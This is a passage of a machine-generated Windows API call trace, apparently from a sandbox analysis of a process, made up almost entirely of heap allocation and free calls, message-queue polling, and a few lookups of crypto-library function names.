[0207.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0207.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0207.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0207.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0207.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0207.103] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0207.103] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0207.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0207.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0207.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf63020 [0207.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0207.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0207.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0207.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0207.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0207.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0207.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0207.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1075020 [0207.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0207.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0207.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0207.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0207.272] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0207.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0207.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0207.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0207.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0207.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0207.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0207.273] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0207.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0207.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0207.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0207.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0207.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0207.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0207.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0207.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0207.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0207.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0207.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0207.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0207.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0207.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0207.275] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0207.275] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0207.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0207.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0207.275] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0207.275] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0207.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0207.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0207.275] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0207.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0207.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0207.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0207.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0207.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0207.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0207.276] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0207.276] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0207.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0207.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0207.277] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0207.277] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0207.277] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0207.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0207.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0207.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0207.278] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0207.278] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0207.278] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0207.278] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0207.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0207.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0207.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0207.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0207.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0207.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0207.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0207.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0207.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0207.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 